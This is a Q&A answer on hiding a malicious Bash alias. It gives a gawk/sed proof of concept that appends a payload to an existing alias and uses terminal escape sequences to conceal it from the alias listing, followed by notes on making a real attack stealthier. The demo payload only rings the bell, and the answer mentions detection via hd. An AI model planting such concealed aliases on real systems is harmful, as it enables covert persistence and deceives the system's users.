Is it possible to hide a malicious alias in Bash on Linux?

Solution 1:

It is possible to do that by appending the existing alias onto the malicious one and using cursor movement to hide it if the alias command is used to display alias definitions. It's not a perfectly foolproof method, but it might go undetected for a while. Piping alias through hd will show you whether there are any escape sequences (cursor movement) in your aliases. Here is a proof of concept for how a malicious command could be inserted into an alias:

alias | gawk 'BEGIN {
        FS = "[ =\047]"
        db = "\\"; sp = db " "; amp = db "&"
        sq= "\047"; bell = "\007"; esc = "\033"
    } 
    NR == 3 { len1 = length($2) }
    NR == 4 {
        alias = $2
        orig = gensub(sq, "", "g", substr($0, match($0, "=") + 1))
        orig = gensub(" ", db sp, "g", orig)
    }
    END {
        hide = "$" db sq sp "--" sp db "\r" esc "[J" esc "[A" db "\t"
        for(i=1; i<len1; i++) {hide = hide esc "[C"}
        cmd = "sed -i s/^alias" sp alias ".*/alias" sp alias "=" db sq "echo" sp db bell db db amp db db amp orig db sq hide db sq "/ aliases"
    system(cmd)
    }'
  • The sed command modifies a file called "aliases" in place - a real script of this type would go for the throat and modify a real script file so the malicious alias would be activated the next time it's executed.
  • The malicious part of this example just rings the terminal bell so you know it's working.
  • The command that is originally aliased will be executed with the contents of hide as an argument so it's conceivable that you could get an error similar to the one reported in the this question. It might be possible to reverse the original and malicious portions to affect this, although this would interfere with arguments being provided to the alias. An attempt is made in the script above to mark the end of arguments with --.
  • Instead of chaining the original and malicious parts with &&, you could pipe one to the next and make the malicious script (represented above by the simple echo command) function as a stdin to stdout pass-through either to modify the data as it's going across or to hide its existence further by not interfering with other redirection
  • Another possibility would be to instead include the original alias inside the malicious script which could remove the cursor movement string from the argument list and pass the remainder on to the original.
  • I arbitrarily chose records 3 and 4, more intelligent code could target particular aliases, but they need to be adjacent (or the cursor movement could be made more complex).
  • The hide string could be modified to include different cursor movement and the text of the original alias so the alias command would appear to show the unmodified alias instead of hiding it along with the malicious part.
  • To try it out as written, you need to have at least four active aliases, run this script, then source the resulting file with . aliases. Then you can try to use the affected alias and see what it looks like when you do alias|hd.
  • This could undoubtedly be rewritten a hundred different ways - all better.
  • How realistic is this type of threat? I don't have a clue. But if I can do it...